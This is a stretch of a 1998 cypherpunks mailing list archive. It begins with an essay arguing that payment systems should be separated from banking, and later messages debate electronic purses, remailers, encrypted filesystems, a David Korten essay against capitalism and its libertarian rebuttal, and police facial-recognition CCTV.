of a wider question as to whether they should be involved
in payment systems.  Such a question is not really discussed;
It is fairly to clear to me after several years of central
bank watching that much of the regulators' thinking in these
areas is muddied due to their lack of appreciation of the
key distinction between banking and payment systems.  In
private and sometimes in public, the more enlightened of the
insiders tend to agree that such a distinction doesn't really
make sense to most central bankers.

In such a void of discussion, it is insufficient to simply
state that the business of payment systems is not the business
of banking, as I have been doing for the last few years.

Making such a statement does gives rise to the conclusion
that as different businesses, payment systems and banking
should at least be separately regulated.  From any sensible
business principles, unless there is a compelling reason to
combine them, one separates them (and it should said that
the marketing benefits of securing additional customer
ownership for banks are not really compelling enough to
argue for public intervention).

Such an argument is consistent and valuable, but has not
really made the grade as far as convincing the world to
change.  We need more.  We need to collect more information
on why payment systems need to be decoupled from banking.

One argument that has arisen, which I have been recently made
aware of through discussions with Douglas Jackson, is that
the combination of payment systems and banking raises the
risk of systemic failure in the economy.

The logic runs like this.  Banks, being the places where the
money is kept, are subject to attachments by goverments;
one of the bugbears of Free Banking is that it is not stable
in the long run, being unable to survive a long-term attack
by a regulator that seeks to attach the funds managed.  Now,
leaving aside from our natural distaste of theft with
coercion, we need to identify how this makes the system
weaker.

When a regulator coerces a loan out of a bank, such as occurs
regularly in periods of systemic turmoil (LTCM, the Asian
crisis, S&L, need we go on?), then the bank that extends these
funds will be made weaker.  That is, it has somehow been
lumbered with a non-performing asset, which weakens its
balance sheet.

To see how this must be the case, consider what would happen
if the loan made was in fact a performing one.  Trivially,
any bank would take on a performing loan without the advice
of any regulator, as this can only be good business.
Therefore, any business that the regulator gets involved in
must be non-performing, and therefore must involve coercion
(or perhaps some other subsidy, but that is not considered
here).

Now, this pushes the bank in the direction of failure.  If
the bank fails, we now have two problems, being the original
failure that caused the coerced loan and the second failure
of the coercee.  It takes no learned education to see that
this process is starting to look like an epidemic.

If the bank does not fail, then all is apparently well and
good.  Regulators might argue that their coercion and the
consequent dead loss to the bank's balance sheet did in
fact pay off, in societal terms, and they simply need to be
careful to only load up a bank as far as it can support the
load.

The problem with this is that the regulators can make no
such argument.  Was it Mises who said that governments have
no special monopoly on good decisions, and therefore no
better ability to regulate than the market itself?  Sooner
or later, the regulators will make a mistake, forcing their
new found compliant bank into bankrupcy in order to bail out
the previous disaster.

Can we accept that?  We might be able to, if it was some
statistical thing - every now and then, our leaders make
a mistake, and something breaks.  Every now and then a
bank fails that did not need to, but most people shed only
crocodile tears over bank failures.

Well, no.  Unfortunately, the mere action of succeeding in
repairing the situation by coercing one good bank to bail out
another bad bank causes a reward scheme that self-perpetuates
the activity.  More simply, bad behaviour gets rewarded, and
good gets punished.

Where does this incentive lead to?  Evidently, repeated
bail-outs and bad loans across the entire banking industry,
which net out to a general weakening of the industry balance
sheet.

This industry-wide weakening to the system of banks is not
a good sign, but when it is coupled, as it causally must be
in this case, with a regulator's propensity to shift bad
onto good, and risk an occasional mistake in the act, then
the whole system is at risk from the very people sworn to
protect it.

People need banking, not banks.  Who said that?  He might
have been thinking of the above, and perhaps predicting that
we would not be able to escape from a situation of regulated
weakness in the banking sector.

Assuming we cannot avoid the above problem, and it is
historically evident that many best efforts have failed, then
we must look at containment.  Banks may be unsound;  the
economy must go on.  And herein lies the nub of Jackson's
argument.  What better way to spread failures than through
payment systems?

Payment systems by their nature link banks into a system of
banking.  Better than that, or worse as the case may be,
payment systems are generally offered to and used by many
other sectors of the economy.  Such a powerful invention as
the payment system, or money as the economists like to call
it, will be made universally available.

Their power is a double-edged sword.  Failure of a payment
system is capable of crippling economies, toppling governments
and causing widespread destruction of wealth.  Russia today,
Albania yesterday, and the Weimar Republic in yesteryear are
powerful reminders of what happens when the payment system
fails.

Clearly, to then reserve payment systems to banks, which are
fundamentally regulated as to be unsound, is to raise systemic
risk.  The hitherto unchallenged argument of the central banks,
that their role is to protect the system against systemic risk,
should now be presented back to them as a reason for them not
reserving payment systems for banks.

Independant payment systems, separated from the regulated,
risky and weakened world in which banks operate, must
therefore decrease systemic risk in the financial system,
ceteris paribus.



This argument is one that supports separation.  Is there
another?  And to be rigourous, is there an argument that
supports the combination of banking and payment systems?

iang



PS: follows is Dave Birch's post that catalysed this rant,
although the thoughts have been permeating for many a year.
Also note that this inclusion does not in any way evidence
Dave's endorsement of my arguments.

=======8<==========8<==========8<==========8<==========8<===
From: Dave Birch <daveb-lists@mail.hyperion.co.uk>

Frank Sudia said

>Several large organizations have undertaken consumer purse trials in the
>US, which have been miserable failures.

The only consumer purse trial I can think of is the Mondex/Visa trial in
New York. I saw a report on the web a couple of weeks ago (Business Week?
Internesia sets in). The top three places where consumers in New York
wanted to use their electronic purses were for subway tickets, taxis and
payphones: not one of these was included in the trial. I bet that you can
buy a fur coat in Bloomingdales with your Mondex card but not pay a
parking meter.

Worldwide, the situation is much therefore more interesting than your
comment suggests. I might characterise it as follows...

Several large organisations (banks) have undertaken consumer digital
money trials which haven't been runaway successes. At retail point of
sale, which is where electronic purses are being trialled, smartcards
have no competitive advantage over cash whatsoever. Why do they persist?
It's because banks treat electronic purses as cards (instead of
computers, which is what they actually are). As a consequence, they are
handled by the "card services" (or whatever) department of the bank. What
is "card services" main business? Merchant acquiring. Who do "card
services" talk to about electronic purses? The merchants that they
already acquire credit card transactions for, rather than they guys who
run parking meters, vending machines, payphones, taxi meters etc etc etc.

Other large organisations (not banks) have undertaken consumer trials
which have been great successes. Examples are

* mass transit operators (e.g. Hong Kong mass transit does more smartcard
transactions every day than Mondex and VisaCash have done in their
history) where people find smartcards far more convenient than tickets or
coins. London Transport are soon going to issue more than 7 million
contactless smartcards for people to pay for subway and bus fares: how
long before the newspaper vendors at the stations accept these cards as
well?

* campuses (in Europe and the US), where people need change for a million
reasons everyday (photocopiers, payphones etc etc) and it saves the
campus operators a lot of money to not have collect cash from machines.

I'm just as frustrated as everyone else that electronic purses aren't
catching on as quickly as I'd like. All I'd say is that purses will come
(even in America), so it's best to just take it easy and wait.

Regards,
Dave Birch.

=== mailto:daveb@hyperion.co.uk ===== http://www.hyperion.co.uk/ ===

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 26 Oct 1998 06:57:37 +0800
To: cypherpunks@cyberpass.net
Subject: It finally happened...
In-Reply-To: <199810251710.SAA07906@replay.com>
Message-ID: <v04020a1fb2594e66e2cf@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:10 PM -0500 on 10/25/98, Anonymous wrote:


> Software mentioned the name of one of them advising on how to
> do this, though it's not clear that Smith knew who he was
> inadverdently passing over while he was avidly trying to catch
> mechanical rabbits sent out to run the inbred speedsters
> ragged chasing easy prey, not knowing, not caring, they're on a
> track, just displaying they're trained to hang in there in sniffing
> range of the bunny's ass: Brown, Foster, Podesta, Hillary, Bill.

Holy shit. Somebody's built JYA rant-maker...

Will wonders ever cease?

;-).

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 26 Oct 1998 07:15:18 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199810251710.SAA07906@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Sure bet the "EOP" was jerking Softwar's chain, observing one or 
two levels deeper what he reports he was getting from his ISP.

Such reconnaissance by fire is customary practice, according 
to multi-level logs of the snoopers prowling the finer-grained
log levels down to what semi-skilled ISPs are able to keep track 
of, report on, and fend the prying devils/customers off with.

Watch out, though, for the deepwatchers of the recon teams
sent out as freshmeat from compsec training bases of the infrastructure
protection farms, some working for, running ISPs. Some of the 
recon by fire teams are bait the CI meanies use to snare those 
working both sides, you know, the venerated old salts "who set up 
Arpanet" and their hotshot inheritors at the best universities and 
tanks in the country convinced they know what's best for the 
churchgoers of techno future.

Software mentioned the name of one of them advising on how to 
do this, though it's not clear that Smith knew who he was 
inadverdently passing over while he was avidly trying to catch 
mechanical rabbits sent out to run the inbred speedsters 
ragged chasing easy prey, not knowing, not caring, they're on a 
track, just displaying they're trained to hang in there in sniffing
range of the bunny's ass: Brown, Foster, Podesta, Hillary, Bill.

EOP is not only what it's reported to be. Nor is any address that's
readily traceable. Onion layered they are, more than NRL knows.

Bet Anonymizer is not only what it's reported to be, that is, the 
semi-sharp operators don't know what it's being used to onion.

Are remailers, recon by fire. Like this?

Is strong encryption the answer? Right, peddle that.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Mon, 26 Oct 1998 07:07:09 +0800
To: cypherpunks@toad.com
Subject: Your New Online Dumbshit Number
Message-ID: <15cdde2bad7d205b156cd7ae06e3e594@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



<Thank you for registering with Adobe Systems, Inc.
<
<Your new Online Customer ID is: 2202094119525317
<
<The PIN you entered and confirmed has been encrypted and stored with your
>registration information.
>
>Please remember your Customer ID and PIN for the next time you login as an
>Adobe Customer on www.adobe.com.

Thank you for spamming the Cypherpunks List.

Your new Online Dumbshit ID is: 3313105220636428

The PIN you entered and confirmed has been encrypted using GAKed crypto and
stored with your registration information, the names of your children, your
address, and nude pictures of your spouse.

Please remember your Dumbshit ID and PIN for the next time you spam as an
Adobe Spokesperson from adobe.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Mon, 26 Oct 1998 09:02:51 +0800
To: "Information Security" <cypherpunks@cyberpass.net>
Subject: Re: Regarding Mitnick: not.
Message-ID: <199810260042.TAA27255@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain



On 10/25/98 12:11 AM, Information Security (guy@panix.com)  passed this 
wisdom:

>ZDnet just sent out a newsletter promoting a series of stories,
>including this one:
>
>#   IS YOUR KID A HACKER? 
>#   Is your teen hacking the Pentagon instead of doing homework?
>#   How to tell -- and how to handle it. Convicted hacker Kevin 
>#   Mitnick gives his views. 
>#   
>#   
>http://chkpt.zdnet.com/chkpt/zdnu98102501/www.zdnet.com/familypc/content/9
>810/columns/parental.html
>
>No mention of Mitnick.
>
>They apparently meant to name the article author 'Kevin Poulsen'.
>
>#   It happened to my family 15 years ago, in one of the first hacker 
>raids in the
>#   country. At that time, I was the teenage miscreant who was illegally 
>accessing
>#   federal computers. Now, in my early thirties, I've begun to wonder how 
>I would
>#   protect a kid of my own from becoming a poster child for computer 
>crime. I believe
>#   the best approach is to stay informed and to communicate with your 
>potential
>#   cyberpunks.
>
>That reminds me. For those who haven't seen it, there is a commercial
>showing a little girl (about 8?) walking into an airport, dizzied by
>all the destination choices. The narrative turns to ~"and the Internet
>too has many destinations, not all of which she is ready for. Travel
>together..."
>
>All things considered, better than the Federales approach.

  actually it sounds more like "Reefer Madness" nineties style.


Brian B. Riley --> http://members.macconnect.com/~brianbr
  For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

  "The first 75% of the project takes 90% of the time;
  the last 15% of the project takes the other 90% of the
  time. -- Barry Wainwright and numerous ofthe engineers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 26 Oct 1998 06:39:12 +0800
To: cypherpunks@Algebra.COM
Subject: Encrypted FS for Linux
Message-ID: <199810252035.VAA26818@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



I know this was discussed recently, but I don't recall seeing the answer.
Are there any recent cryptographic filesystem patches for Linux (preferably
later 2.1 kernels) which implement at LEAST CAST-128 and IDEA?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 26 Oct 1998 06:40:46 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Feds Seize Houses for Illegal Downloading
Message-ID: <199810252135.WAA31125@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 01:08 AM 10/25/98 -0000, Secret Squirrel wrote:
>What are they going to do, launch a cruise missile strike on the server and
>send the shock troops in to put all anonymous remailers out of business?

You don't think Anguilla is due for a Tomahawk sometime in the future?

	







  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 26 Oct 1998 15:16:00 +0800
To: cypherpunks@cyberpass.net
Subject: anonymous remailers, network computer, singles sites, etc.
Message-ID: <199810260646.WAA24262@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



well, nobody has commented on this a whole
lot here from what I can tell, 
but the net is now *plastered* with
anonymous remailers in various forms. it's
definitely not going away.

we now have mail.yahoo.com which can create
an alias in a few minutes. also, www.hotmail.com
and there are others.

one could argue the Net PC (NC) is already here!!
web TV allows much software to be run on it
(btw, does anyone know if it runs java? if so,
I'd say that's definitely a NC). the point is
that sites such as games.yahoo.com etc. are
essentially sites in which a web site is
indistinguishable from software. "the network
is the computer". larry ellison went home
with his tail between his legs on the NC idea,
but what he doesn't realize is that it is
actually here en masse. (just not so much
in the corporate arena as he envisioned)

an interesting subset of anonymity is being
used very intensely with online personals!!
here's a sophisticated example

http://personals.swoon.com/e_personals/static/help.html#e-mail

they have a lot of info on how their site
acts as a remailer for email messages.
this is a very "slick" online magazine clearly showing
huge amount of production cash which I personally
haven't heard too much about. a bit risque for
some peoples tastes, but very intriguing application
of cyberspace one never would have dreamt up just a 
few moons ago.

incidentally, there are bazillions of singles sites
out there on the internet. its another application of
the net one wouldn't necesarily have foreseen, but
it really makes sense. hooking up people with people.
a strange "killer app" of the net judging by how many
there are.  there's less "romantic" types of this thing too, for
just hooking up people with similar interests, such
as www.icq.com and www.cyberfriends.com

one tasteful/decent place to start for singles sites is

http://www.zdnet.com/yil/content/mag/9803/gurlsites.html

ultimately the internet population is starting to discover that
the key thing it does is related to *communities*....






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 26 Oct 1998 15:28:51 +0800
To: cypherpunks@cyberpass.net
Subject: capitalism run amuck by Korton
Message-ID: <199810260701.XAA25129@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



this guy is really brilliant. the essay is brillant.
the pro-capitalist elements here should read this
very carefully and read his book. very well researched.
impeccable credentials. the real "truth behind the
scenes and events" of what's going on in the world 


------- Forwarded Message

Date: Thu, 22 Oct 1998 08:04:39 +0000
To: uk-anti-maif@iirc.net
From: Paul Swann <pswann@easynet.co.uk>
Subject: Your Mortal Enemy

Your Mortal Enemy

Faceless bankers now move two trillion dollars around the world every day,
searching for quick profits, breaking national economies and putting ever
more pressure on natural wealth. What's to be done? Slay the beast of
capitalism, says David C Korten, and return money to its proper role.

An edited and ammended extract of David Korten's Schumacher Lecture in
Bristol on October 17 1998.

Published in The Guardian, October 21 1998.


For those of us who grew up believing capitalism is the foundation of
democracy, market freedom, and the good life it has been a rude awakening
to realise that under capitalism, democracy is now for sale to the highest
bidder, the market is centrally planned by global mega-corporations larger
than most countries, denying one's brothers and sisters a source of
livelihood is now rewarded as an economic virtue, and the destruction of
nature and life to make money for the already rich is treated as progress.

The world is now ruled by a global financial casino staffed by faceless
bankers and hedge fund speculators who operate with a herd mentality in the
shadowy world of global finance. Each day they move more than two trillion
dollars around the world in search of quick profits and safe havens sending
exchange rates and stock markets into wild gyrations wholly unrelated to
any underlying economic reality.

With abandon they make and break national economies, buy and sell
corporations, and hold the most powerful politicians hostage to their
interests. When their bets pay off they claim the winnings as their own.
When they lose, they run to governments and public institutions to protect
them against loss with pronouncements about how the poor must tighten their
belts and become more fiscally prudent.

In the United States, the media keep the public preoccupied with the
details of our president's sex life and calls for his impeachment for lying
about an inconsequential affair. Meanwhile, Congress and the president are
working out of view to push through funding increases for the IMF to bail
out the banks who put the entire global financial system at risk with
reckless lending.

They are advancing financial deregulation to encourage even more reckless
financial speculation. And they are negotiating international agreements
such as the Multilateral Agreement on Investment intended to make the world
safe for financial speculators by preventing governments from intervening
to regulate their activities.

To understand what is happening we must educate ourselves about the nature
of money and the ways of those who decide who will have access to it and
who will not.

As a medium of exchange, money is one of the most useful of human
inventions. But as we become ever more dependent on it to acquire the basic
means of our sustenance, we give to the institutions and people who control
its creation and allocation the power to decide whether we shall live in
prosperity or destitution.

With the increasing breakdown of community and governmental social safety
nets, our money system has become the most effective instrument of social
control and extraction ever devised. The fact that few of us think of the
money system as an instrument of control makes it more powerful and
efficient as an instrument of wealth extraction.

What of capitalism, the self-proclaimed champion of democracy, market
freedom, peace and prosperity? Modern capitalism involves a concentration
of wealth by the few to the exclusion of the many; it is more than a system
of human elites. It has evolved into a system of autonomous rule by money
and for money that functions on autopilot beyond the control of any human
actor or responsiveness to any human sensibility.

Contrary to its claims, capitalism is showing itself to be the mortal enemy
of democracy and the market. Its relationship to democracy and the market
economy is now much the same as the relationship of a cancer to the body
whose life energy it expropriates.

Cancer is a pathology that occurs when an otherwise healthy cell forgets
that it is a part of the body and begins to pursue its own unlimited growth
without regard to the consequences for the whole. The growth of the
cancerous cell deprives the healthy cells of nourishment and ultimately
kills both the body and itself. Capitalism does much the same to the
societies it infests.

One reason we fail to recognise the seriousness of our predicament is
because we fail to see how capitalism is destroying the world's real
wealth. It destroys social capital when it breaks up unions, bids down
wages, and treats workers as expendable commodoties, leaving society to
absorb the family and community breakdown and violence that are inevitable
consequences. It destroys institutional capital when it undermines the
function of governments and democracy by weakening environmental health and
labour standards, and extracting public subsidies, bailouts and tax
exemptions which inflate corporate profits while passing the burdens of
risk to governments and the working poor.

We arejust beginning to wake up to the fact that the industrial era has in
a mere century consumed a consequential portion of the natural capital it
took evolution millions of years to create. It is now drawing down our
social, institutional and human capital as well.

Democracy and markets are wonderful ways of organising the political and
economic life of a society to allocate resources fairly and efficiently
while securing the freedom and sovereignty of the individual. But modern
capitalism is about using money to make money for people who already have
more of it than they need. Its institutions breed inequality, exclusion,
environmental destruction, social irresponsibility and economic instability
while homogenizing cultures, weakening institutions of democracy and
eroding the moral and social fabric of society.

Though capitalism cloaks itself in the rhetoric of democracy and the
market, it is dedicated to the principle that sovereignty properly resides
not in the person, but rather in money and property. Under democracy and
the market, the people rule. Under capitalism, money rules.

The challenge is to replace the global capitalist economy with a properly
regulated and locally rooted market economy that invests in the
regeneration of living capital, increases net beneficial economic output,
distributes that output justly and equitably to meet the basic needs of
everyone, strengthens the institutions of democracy and the market, and
returns money to its proper role as the servant of productive activity.

It should favour smaller local enterprise over global corporations,
encourage local ownership, penalise financial speculation, and give
priority to meeting the basic needs of the many over providing luxuries and
diversions for the wealthy few. In most aspects it should do exactly the
opposite of what the global capitalist economy is doing.

Most of the responsibility and initiative must come from local and national
levels. Supporting nations and localities in this task should become the
core agenda of the United Nations, as the protection of people and
communities from predatory global corporations and finance is arguably the
central security issue of our time.

The first positive step would be to dismantle the World Trade Organisation
on the ground that there is no legitimate need for a global police force to
protect global corporations from the actions of democratically-elected
national and local governments so that the richest one per cent of humanity
can become even richer at the expense of the rest.

The WTO is a powerful, but illegitimate and democratically unaccountable
institution put in place through largely secret negotiations with little or
no public debate to serve purposes largely conltrary to the public
interest. The 99 percent of the world's people whose interests it does not
serve have every right to eliminate it.

Addressing the real need to police the global economy requires an
organisation very different from the WTO - an open and democratic
organisation with the mandate and power to set and enforce rules holding
those corporations that operate across national borders democratically
accountable to the people and priorities of the nations where they operate.

It should as well have the power to regulate and tax international
financial flows and institutions. And it should have a mandate to make
speculation unprofitable and to help protect the integrity of domestic
financial institutions from the financial markets and the predatory
practices of international financial speculators.

There are obvious questions as to whether such proposals are politically
feasible given the stranglehold of corporations and big money over our
political processes. Yet we could use this same reasoning to conclude that
human survival itself is not politically feasible.

Global corporations and financial institutions are our collective
creations. And we have both the right and the means to change or replace
them if they do not serve.


Dr David Korten is president of the People-Centered Development Forum
in Washington State, USA <http://iisd1.iisd.ca/pcdf> and the author of
'When Corporations Rule the World' and the forthcoming 'The Post-Corporate
World: Life After Capitalism'.




- - --------------6FBCF3F02DF50E9512DB50EB--


- ------- End of Forwarded Message


------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Tue, 27 Oct 1998 07:25:19 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: UK police chase crooks on CCTV (fwd)
In-Reply-To: <199810211322.IAA03036@einstein.ssz.com>
Message-ID: <3.0.5.32.19981026092728.0096cec0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:22 AM 10/21/98 -0500, Suspect Jim Choate wrote:
>> ``The only people entered on to the system will be convicted criminals
>> who, through our intelligence, we believe are habitually committing
>> crimes in the area,'' The Daily Mail quoted police Chief Superintendent
>> Dave Armond as saying. ``If people are not committing crime they have
>> nothing to fear, but if they are among the small minority who are, the
>> message is, 'We are watching out for you.'''
>> The newspaper reported that police initially will use the system to
>> concentrate on catching robbery suspects. In the future, however, it
>
>Excuse me....
>
>Since when does 'suspected of' equate to 'convicted criminal'?
>Also, in order to wath you (sic) they have to watch everyone - in effect
>guilty until proven innocent by the computer software.

The policeman's statement, if honest, implies that the 
system needs a real mugshot or more detailed set of pictures to work from, 
so they're going to start with feeding it the Usual Suspects,
for whom they can get good data for the system to search.
It probably also has capacity limitations, so they won't be searching
for everybody they have pictures of, just the most likely.

However, looking for more people doesn't take more cameras,
just more backend computers analyzing the video feeds,
so Moore's Law will increase analysis capacity rapidly,
though it will also make it cheap to put more cameras out there.

>What sort of civil recovery are provided for the inevitable software errors?
>I bet nadda, and that's wrong too.

Software errors don't seem to be a major problem here - 
false negatives just mean they miss an opportunity to catch somebody, and
false positives mean the system says "Looks like Joe Suspect on Camera 3!" or
"Looks like Joe Suspect on Videotape 32674 at 23:10 entering the bank" - 
in either case, the police can then look at the picture and see if it is.
Of course, if you're Jack Suspect, misidentified as Joe Suspect,
the police _can_ break down your door at 6am, haul you in,
and later apologize by saying "Sorry, honest mistake, it was dark and
all you <ethnic>s look alike, but your Public Defender says it's
not you in the video so we'll let you go this time, even though you 
missed your parole office meeting because we had you in jail."

>We need a law or court ruling pretty quickly in the US that sets the
>standard that a group of people have no more or less rights than an
>individual. This will required LEA's to provide probable cause prior to any
>actions against groups of people (such as this).

Ain't gonna happen - are you kidding?  If there is a ruling like that,
it'll be done in some way that restricts citizen rights rather than
expanding them, or expands police powers rather than restricting them.
It's already legal for cops to hang around street corners watching for 
suspicious activities or suspicious people, and all video recognition
technology does is increase their effectiveness and speed at doing things
they already are allowed to do.

Unfortunately, I'm being increasingly forced to take the David Brin position of
"Cameras are cheap, get used to it, just make sure we have more cameras
pointing at the cops than they have pointing at us, and make sure
the cameras the government has are citizen-accessible as well."

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Mon, 26 Oct 1998 22:19:56 +0800
To: cypherpunks@cyberpass.net
Subject: Re: capitalism run amuck by Korton
In-Reply-To: <199810260701.XAA25129@netcom13.netcom.com>
Message-ID: <36348728.37872D5D@workmail.com>
MIME-Version: 1.0
Content-Type: text/html




Vladimir Z. Nuri wrote:
Your Mortal Enemy
Faceless bankers now move two trillion dollars around the world every
day,
searching for quick profits, breaking national economies and putting
ever
more pressure on natural wealth. What's to be done? Slay the beast
of
capitalism, says David C Korten, and return money to its proper role.
Faceless -- oooh that sounds creepy.  National economies -- by all
means, we must maintain our favorite 19th century institutions. Natural
wealth - sounds like an oxymoron. The beast of capitalism  -- we all
know that beasts mean you harm, while good decent socialists are only twisting
your arm for your own good. Money is any form of token used to communicate
value, from bricks of gold to bricks of cocaine. What has seriously gone
wrong with the role of money, is that it has been divorced from any intrinsic
value -- largely due to the meddling of the various stripes of do-gooders,
collectivists and distributivists.  What this guy can't seem to grasp,
is that there is a distinct difference between capitalism in a free market,
and the kind of corporate-capitalism that the world is enmeshed in now.
The former allows for the free exchange of value based upon the participants
understanding of that value.  The latter is all bound up in nebulous
concepts such as "natural wealth", "legal tender", "zero sum economies"
etc.
An assumption is made that I fundamentally disagree with -- democracy
is the holy grail of human social intercourse.  Never, in recorded
history, has democracy existed without the support of client slave states/populations. 
Democracy is nothing more than a rationalization for the majority to oppress
the minority.  It has always lead to the creation of a ruling class
of administrators, switching it to a minority oppression of the majority. 
With this kind of thinking, the KKK is a thoroughly democratic assemblage. 
The majority have decided that you should be hanged, so you should go along
peacefully and place your own neck in the noose. I've said this before,
but its a whisper in a propaganda hurricane,  The US is not a democracy,
it is a republic. For those of you who don't know the difference; a democracy
puts everything up for grabs, including your life, liberty and the pursuit
of happiness, while a republic provides 'certain inalienable rights', similar
to those  currently being alienated by the Klinton Kongressional Klan.
This polemic is filled with all kinds of emotive language typical of
the new-liberal, correct-think agenda. Look out for words like must
and will and should, hallmarks of the unseen coercive central
planner.
For those of us who grew up believing capitalism
is the foundation of
democracy, market freedom, and the good life it has been a rude awakening
to realise that under capitalism, democracy is now for sale to the
highest
bidder, the market is centrally planned by global mega-corporations
larger
than most countries, denying one's brothers and sisters
Strange,  why would my brother and 2 sisters be talking to this guy?
 a source of livelihood is now rewarded as an
economic virtue, and the destruction of
nature and life
How exactly,  can natural beings - humans - destroy nature? 
Does he mean change the expected outcome in some way that him and his brothers
and sisters disapprove of?
 to make money for the already rich
The enemy is identified.  This is socialist rant #1 -- 'soak the rich
until there ain't no rich no more'.
is treated as progress. The world is now ruled by
a global financial casino staffed by faceless bankers and hedge
fund speculators who operate with a herd mentality in the shadowy
world of global finance.
Shadowy people in a shadowy world -- sounds like Washington D.C.
Each day they move more than two trillion
dollars around the world in search of quick profits and safe havens
So slow or no profits and unsafe havens are better?
sending exchange rates and stock markets into wild
gyrations wholly unrelated to
any underlying economic reality.
This is the underlying economic reality.
With abandon they make and break national economies,
buy and sell
corporations, and hold the most powerful politicians hostage
to their
interests.
We do have an answer to that last one ...
When their bets pay off they claim the winnings as
their own.
When they lose, they run to governments and public institutions to
protect
them against loss with pronouncements about how the poor must tighten
their
belts and become more fiscally prudent.
Simple, lets close the public trough and dismantle the gravy train.
In the United States, the media keep the public preoccupied
with the
details of our president's sex life and calls for his impeachment for
lying
about an inconsequential affair. Meanwhile, Congress and the president
are
working out of view to push through funding increases for the IMF to
bail
out the banks who put the entire global financial system at risk with
reckless lending.
IMFs are the ultimate in fiat currencies, backed only by political will.
They are advancing financial deregulation to encourage
even more reckless
financial speculation. And they are negotiating international agreements
such as the Multilateral Agreement on Investment intended to make the
world
safe for financial speculators by preventing governments from intervening
to regulate their activities.
The governments, of course, are the tools of the people, and can be trusted
to regulate wisely.
To understand what is happening we must educate ourselves
about the nature
of money and the ways of those who decide who will have access to it
and
who will not. As a medium of exchange, money is one of the most useful
of human inventions. But as we become ever more dependent on it to acquire
the basic means of our sustenance, we give to the institutions and people
who control its creation and allocation the power to decide whether we
shall live in prosperity or destitution.
Repeal legal tender laws and their handmaiden, taxation. In laissez-faire
Hong Kong in the '70s, banks printed their own 'banknotes' - all different
sizes, colors and denominations, and all acceptable Hong Kong dollars. 
The security of each such currency, was the security of the institution
and the amount by which it inflated its money supply.  It was common
for people to have accounts in several banks and to move their money between
banks based upon the relative value of the bank's currencies.  In
such an economy, fiat valuations automatically cause the currency to diminish
in its usefulness, and to ultimately go out of business.  If you control
the forms of acceptable money, there is little option but to use a fiat
backed currency.
The chimaera represented here, is that accumulation of wealth necessarily
expresses itself as a desire to wield power over others.  On the contrary,
the creation of a common political currency of power necessitates the exercise
of power in order to keep accumulated wealth.  Solution:  abolish
the common currency of power as wielded by the state.
With the increasing breakdown of community and governmental
social safety
nets, our money system has become the most effective instrument of
social
control and extraction ever devised. The fact that few of us think
of the
money system as an instrument of control makes it more powerful and
efficient as an instrument of wealth extraction.
Personally, I would't trust any assemblage of more than 7 human beings
with my welfare. The anonymity provided by such concepts as 'community'
and 'governmental social safety nets', encourages, and probably mandates,
corruption.
What of capitalism, the self-proclaimed champion
of democracy, market
freedom, peace and prosperity? Modern capitalism involves a concentration
of wealth by the few to the exclusion of the many; it is more than
a system
of human elites. It has evolved into a system of autonomous rule by
money
and for money that functions on autopilot beyond the control of any
human
actor or responsiveness to any human sensibility.
I must have missed that proclamation.  Probably too busy paying taxes
and otherwise knuckling under to the democracy.
Contrary to its claims, capitalism is showing itself
to be the mortal enemy
of democracy and the market. Its relationship to democracy and the
market
economy is now much the same as the relationship of a cancer to the
body
whose life energy it expropriates.
Notice he says market, and not free market. How he can use democracy and
market in the same sentence eludes me.  Democracy means people get
to coerce the behaviour of others.  The market defines how people
interact with each other.  I can only infer he suggests people coerce
how people interact. Capitalism is the cancer on this noble ideal, because
it expresses the notion that human interaction can occur without the need
for any noble tinkering.
Cancer is a pathology that occurs when an otherwise
healthy cell forgets
that it is a part of the body and begins to pursue its own unlimited
growth
without regard to the consequences for the whole.
The whole what? cancer?  He obviously doesn't approve of those not
in lock-step with the 'body politic'.  Perhaps the cell doesn't forget,
